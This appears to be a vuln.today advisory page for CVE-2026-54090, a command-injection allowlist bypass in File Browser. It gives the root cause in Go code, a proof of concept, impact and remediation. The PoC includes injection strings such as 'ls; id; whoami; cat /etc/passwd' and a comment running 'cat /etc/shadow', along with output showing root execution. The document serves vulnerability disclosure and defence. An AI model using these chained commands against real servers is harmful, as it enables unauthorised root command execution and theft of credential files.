Skip to main content

File Browser CVE-2026-54090

| EUVDEUVD-2026-39511 HIGH
Command Injection (CWE-77)
2026-06-12 https://github.com/filebrowser/filebrowser GHSA-8c9q-7855-wfxq
8.7
CVSS 4.0 · Vendor: https://github.com/filebrowser/filebrowser
Share

Severity by source

Vendor (https://github.com/filebrowser/filebrowser) PRIMARY
8.7 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
8.8 HIGH

Network-reachable WebSocket API (AV:N); requires an authenticated user with Execute permission (PR:L), no UI; bypass yields full host command execution (C/I/A:H) within the server's process scope (S:U).

3.1 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (https://github.com/filebrowser/filebrowser).

CVSS VectorVendor: https://github.com/filebrowser/filebrowser

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

6
Analysis Updated
Jun 25, 2026 - 19:28 vuln.today
v3 (cvss_changed)
Analysis Updated
Jun 25, 2026 - 19:28 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jun 25, 2026 - 19:22 vuln.today
cvss_changed
CVSS changed
Jun 25, 2026 - 19:22 NVD
8.7 (HIGH)
Source Code Evidence Fetched
Jun 12, 2026 - 23:18 vuln.today
Analysis Generated
Jun 12, 2026 - 23:18 vuln.today

DescriptionCVE.org

> [!NOTE] > This feature has been disabled by default for all installations from v2.33.8 onwards, including for existent installations. To exploit this vulnerability, the instance administrator must turn on a feature and ignore all the warnings about known vulnerabilities. We're publishing this new advisory to make it clear that all vulnerabilities concerning this feature are disclosed. > > For more information about tracking vulnerability issues related to the Command Execution features, check https://github.com/filebrowser/filebrowser/issues/5199.

Summary

When a shell interpreter is configured (e.g. /bin/sh -c), the command allowlist can be bypassed through shell metacharacters. The allowlist validates only the first token of user input, but the entire raw string is handed to the shell - semicolons, pipes, backticks, and $() all work to chain arbitrary commands after a permitted one.

This is a distinct issue from CVE-2025-52995 (regex partial matching, fixed in 2.33.10) and CVE-2025-52903 (GTFOBins-style subcommands). The slices.Contains fix does not prevent this bypass.

Affected Location

  • runner/parser.go, function ParseCommand (lines 10-25)
  • http/commands.go, function commandsHandler (lines 72-86)

Root Cause

ParseCommand extracts the first token via SplitCommandAndArgs for the allowlist check, then passes the entire raw input to the shell:

go
func ParseCommand(s *settings.Settings, raw string) (command []string, name string, err error) {
    name, args, err := SplitCommandAndArgs(raw)
    if len(s.Shell) == 0 || s.Shell[0] == "" {
        command = append(command, name)
        command = append(command, args...)
    } else {
        command = append(command, s.Shell...)
        command = append(command, raw)   // full user input, metacharacters included
    }
    return command, name, nil
}

In commandsHandler:

go
if !slices.Contains(d.user.Commands, name) {  // name = "ls", passes
    // reject
}
cmd := exec.Command(command[0], command[1:]...)
// actually executes: /bin/sh -c "ls; id; cat /etc/shadow"

name is ls - allowed. But /bin/sh -c interprets the rest.

PoC

Prerequisites:

  • Command execution enabled (--disable-exec=false)
  • Shell configured to /bin/sh -c
  • User has Execute permission with an allowlist, e.g. git,ls,cat

Steps:

  1. Log in, grab a JWT:
POST /api/login
{"username":"admin","password":"..."}
  1. Open a WebSocket to /api/command/ with header X-Auth: <jwt>.
  2. Send:
ls; id; whoami; cat /etc/passwd
  1. All four commands execute and output is returned. Sending just whoami alone returns "Command not allowed." - the allowlist is active but bypassable.

Output:

bin
etc
home
...
===BYPASS===
uid=0(root) gid=0(root) groups=0(root),10(wheel)
root
root:x:0:0:root:/root:/bin/sh

Tested against commit d236f1c (frontend v3.0.0) on the official Docker image filebrowser/filebrowser:latest.

Impact

Any user with Execute permission and at least one allowed command can run arbitrary OS commands at the privilege level of the server process. In the default container this is root.

AnalysisAI

Authenticated command injection in File Browser (github.com/filebrowser/filebrowser/v2 before 2.33.8) lets any user holding Execute permission bypass the command allowlist when a shell interpreter such as /bin/sh -c is configured. Because the allowlist validates only the first token while the full raw string is passed to the shell, an attacker chains arbitrary OS commands after a permitted one using metacharacters (;, |, backticks, $()), executing them at the server process privilege - root in the default Docker image. A detailed working PoC is published in the GHSA advisory; EPSS is very low (0.02%, 7th percentile) and the vulnerable Command Execution feature is disabled by default from 2.33.8 onward, including for upgraded existing installations.

Technical ContextAI

File Browser is a self-hosted Go web application for browsing and managing files, commonly run as the official filebrowser/filebrowser Docker container. The flaw is CWE-77 (Improper Neutralization of Special Elements used in a Command). In runner/parser.go, ParseCommand calls SplitCommandAndArgs to extract the first token (name) for the allowlist check, but when settings.Shell is set it appends the entire untrimmed user input as a single argument to the shell invocation (e.g. /bin/sh -c "<raw>"). In http/commands.go, commandsHandler checks slices.Contains(d.user.Commands, name) - so 'ls' passes - then runs exec.Command with the shell, which re-parses and honors all metacharacters in the rest of the string. The affected package per CPE is pkg:go/github.com_filebrowser_filebrowser_v2. This is explicitly distinct from CVE-2025-52995 (regex partial matching) and CVE-2025-52903 (GTFOBins subcommands); the prior slices.Contains hardening does not address shell metacharacter chaining.

RemediationAI

Vendor-released patch: upgrade to File Browser 2.33.8 or later, which disables the Command Execution feature by default for both new and existing installations; related allowlist hardening also landed in 2.33.10. The most effective control is to leave command execution disabled - run with --disable-exec=true (the new default) so the vulnerable code path is unreachable. If you do not need shell command execution, do not re-enable it; the vendor explicitly warns against turning the feature on. If you must keep it enabled, avoid configuring a shell interpreter (clear settings.Shell so commands run via direct exec without /bin/sh -c re-parsing), which removes the metacharacter chaining vector at the cost of losing shell features like pipes and globbing; additionally restrict Execute permission to a minimal set of trusted users, and run the container as a non-root user to limit blast radius rather than the default root. Refer to GHSA-8c9q-7855-wfxq and issue #5199 for vendor guidance.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-54090 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy